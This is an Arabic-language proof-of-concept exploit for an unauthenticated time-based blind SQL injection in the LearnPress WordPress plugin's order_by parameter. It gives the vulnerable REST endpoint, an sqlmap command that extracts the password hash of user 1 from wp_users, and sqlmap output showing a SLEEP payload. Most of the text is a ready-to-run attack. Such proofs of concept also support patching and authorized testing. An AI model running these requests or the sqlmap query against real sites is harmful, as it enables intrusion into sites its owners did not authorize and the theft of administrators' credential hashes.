
إثبات مفهوم لاستغلال ثغرة حقن SQL أعمى قائم على الوقت في إضافة LearnPress الخاصة بووردبريس، مما يسمح للمهاجمين غير المصادق عليهم باستخراج بيانات حساسة عبر معامل order_by.
حقن SQL زمني (Time-based SQLi)
الوصف لا يقوم الإضافة بتعقيم وهروب معامل order_by بشكل صحيح قبل استخدامه في جملة SQL، مما يؤدي إلى ثغرة حقن SQL يمكن استغلالها من قبل المستخدمين غير المصادق عليهم
طلب GET القابل للاستغلال: https://vulnerablewordpress.com/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID&order=DESC&limit=10&return_type=html
احفظ طلب GET
sqlmap -r ~/sqli.req -p order_by --technique=T --sql-query = 'select user_pass from wp_users where id = 1'
استأنف sqlmap نقطة (نقاط) الحقن التالية من الجلسة المخزنة:
Parameter: #1* (URI) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: https://VULNERABLEWORDPRESS/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID AND (SELECT 7508 FROM (SELECT(SLEEP(5)))VVvd)&order=DESC&limit=10&return_type=html